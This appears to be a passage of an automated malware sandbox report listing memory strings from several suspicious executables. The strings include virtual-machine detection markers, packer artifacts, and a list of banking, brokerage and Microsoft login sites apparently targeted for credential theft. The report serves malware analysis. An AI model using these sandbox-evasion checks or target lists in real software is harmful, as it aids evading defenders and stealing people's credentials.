Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: RoamingCFCGIIEHIE.exe, RoamingCFCGIIEHIE.exe, 00000005.00000002.2234128926.000000000054C000.00000040.00000001.01000000.00000009.sdmp, userAKKKFBGDHJ.exe, userAKKKFBGDHJ.exe, 00000008.00000002.2311861747.000000000022E000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, explorti.exe, 00000009.00000002.2272766960.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000A.00000002.2271816286.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000010.00000002.2340574498.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000012.00000002.3243966824.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3244272627.000000000058C000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V (guest)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 624f4d727e.exe, 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareo[
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.0000000000516000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.0000000000516000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.0000000000516000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.0000000000516000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.0000000000516000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.0000000000516000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: RoamingCFCGIIEHIE.exe, 00000005.00000002.2234128926.000000000054C000.00000040.00000001.01000000.00000009.sdmp, userAKKKFBGDHJ.exe, 00000008.00000002.2311861747.000000000022E000.00000040.00000001.01000000.0000000B.sdmp, explorti.exe, 00000009.00000002.2272766960.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, explorti.exe, 0000000A.00000002.2271816286.000000000058C000.00000040.00000001.01000000.0000000C.sdmp, axplong.exe, 00000010.00000002.2340574498.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000012.00000002.3243966824.00000000009DE000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3244272627.000000000058C000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2382069321.00000000024A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2382069321.00000000024E4000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000012.00000002.3256607765.0000000001248000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000012.00000002.3256607765.000000000121A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3258303084.0000000001608000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3258303084.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.0000000002587000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.000000000264F000.00000004.00000020.00020000.00000000.sdmp, 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: firefox.exe, 0000001E.00000003.2957174991.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031858393.00000270CC6A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958487375.00000270CC6A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 624f4d727e.exe, 00000018.00000002.2899758965.00000000025D2000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: xVBoxService.exe
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 624f4d727e.exe, 00000018.00000002.2899807297.000000000264F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000003E6000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000003E6000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000003.2084971278.0000000028D17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
